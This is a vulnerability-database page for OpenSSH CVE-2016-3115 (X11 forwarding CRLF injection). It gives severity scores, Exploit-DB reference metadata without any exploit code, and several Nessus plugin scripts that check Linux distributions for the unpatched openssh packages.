Vulnerabilities > CVE-2016-3115
Attack vector
NETWORK Attack complexity
LOW Privileges required
LOW Confidentiality impact
LOW Integrity impact
LOW Availability impact
NONE Summary
Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions.
Vulnerable Configurations
Exploit-Db
description BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit. Remote exploit for Hardware platform id EDB-ID:40858 last seen 2016-12-04 modified 2016-12-04 published 2016-12-04 reporter Exploit-DB source https://www.exploit-db.com/download/40858/ title BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit description OpenSSH 7.2p1 - xauth Injection. CVE-2016-3115. Remote exploits for multiple platform file exploits/multiple/remote/39569.py id EDB-ID:39569 last seen 2016-03-17 modified 2016-03-16 platform multiple port 22 published 2016-03-16 reporter tintinweb source https://www.exploit-db.com/download/39569/ title OpenSSH <= 7.2p1 - xauth Injection type remote
Nessus
NASL family Huawei Local Security Checks NASL id EULEROS_SA-2016-1008.NASL description According to the versions of the openssh packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) - An access flaw was discovered in OpenSSH the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-05-01 plugin id 99771 published 2017-05-01 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99771 title EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99771); script_version("1.13"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04"); script_cve_id( "CVE-2016-1908", "CVE-2016-3115" ); script_name(english:"EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008)"); script_summary(english:"Checks the rpm output for the updated packages."); script_set_attribute(attribute:"synopsis", value: "The remote EulerOS host is missing multiple security updates."); script_set_attribute(attribute:"description", value: "According to the versions of the openssh packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) - An access flaw was discovered in OpenSSH the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."); # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1008 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?48f275ff"); script_set_attribute(attribute:"solution", value: "Update the affected openssh packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/01"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-server"); script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Huawei Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp"); script_exclude_keys("Host/EulerOS/uvp_version"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/EulerOS/release"); if (isnull(release) || release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS"); if (release !~ "^EulerOS release 2\.0(\D|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0"); sp = get_kb_item("Host/EulerOS/sp"); if (isnull(sp) || sp !~ "^(1)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1"); uvp = get_kb_item("Host/EulerOS/uvp_version"); if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1", "EulerOS UVP " + uvp); if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu); flag = 0; pkgs = ["openssh-6.6.1p1-25.4.h3", "openssh-askpass-6.6.1p1-25.4.h3", "openssh-clients-6.6.1p1-25.4.h3", "openssh-keycat-6.6.1p1-25.4.h3", "openssh-server-6.6.1p1-25.4.h3"]; foreach (pkg in pkgs) if (rpm_check(release:"EulerOS-2.0", sp:"1", reference:pkg)) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }
NASL family Fedora Local Security Checks NASL id FEDORA_2016-D339D610C1.NASL description This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-04-01 plugin id 90285 published 2016-04-01 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90285 title Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-d339d610c1. # include("compat.inc"); if (description) { script_id(90285); script_version("2.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-d339d610c1"); script_name(english:"Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1316829" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?9163a8a7" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/29"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/01"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC22", reference:"openssh-6.9p1-11.fc22")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }
NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2016-0465.NASL description Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90078 published 2016-03-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90078 title RHEL 7 : openssh (RHSA-2016:0465) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0465. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(90078); script_version("2.17"); script_cvs_date("Date: 2019/10/24 15:35:41"); script_cve_id("CVE-2016-1908", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0465"); script_name(english:"RHEL 7 : openssh (RHSA-2016:0465)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2016:0465" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-1908" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3115" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.2"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.4"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.5"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.6"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2016:0465"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", reference:"openssh-debuginfo-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc"); } }
NASL family Fedora Local Security Checks NASL id FEDORA_2016-FC1CC33E05.NASL description Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-04-27 plugin id 90740 published 2016-04-27 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90740 title Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-fc1cc33e05. # include("compat.inc"); if (description) { script_id(90740); script_version("2.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-fc1cc33e05"); script_name(english:"Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?354d4b7a" ); script_set_attribute( attribute:"solution", value:"Update the affected gsi-openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/04/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/27"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC22", reference:"gsi-openssh-6.9p1-8.fc22")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh"); }
NASL family Fedora Local Security Checks NASL id FEDORA_2016-08E5803496.NASL description Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-05-09 plugin id 90947 published 2016-05-09 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90947 title Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-08e5803496. # include("compat.inc"); if (description) { script_id(90947); script_version("2.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-08e5803496"); script_name(english:"Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?57a55728" ); script_set_attribute( attribute:"solution", value:"Update the affected gsi-openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:24"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/09"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^24([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 24.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC24", reference:"gsi-openssh-7.2p2-2.fc24")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh"); }
NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2016-0466.NASL description From Red Hat Security Advisory 2016:0466 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90075 published 2016-03-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90075 title Oracle Linux 6 : openssh (ELSA-2016-0466) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466 and # Oracle Linux Security Advisory ELSA-2016-0466 respectively. # include("compat.inc"); if (description) { script_id(90075); script_version("2.6"); script_cvs_date("Date: 2019/09/27 13:00:37"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"Oracle Linux 6 : openssh (ELSA-2016-0466)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2016:0466 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. 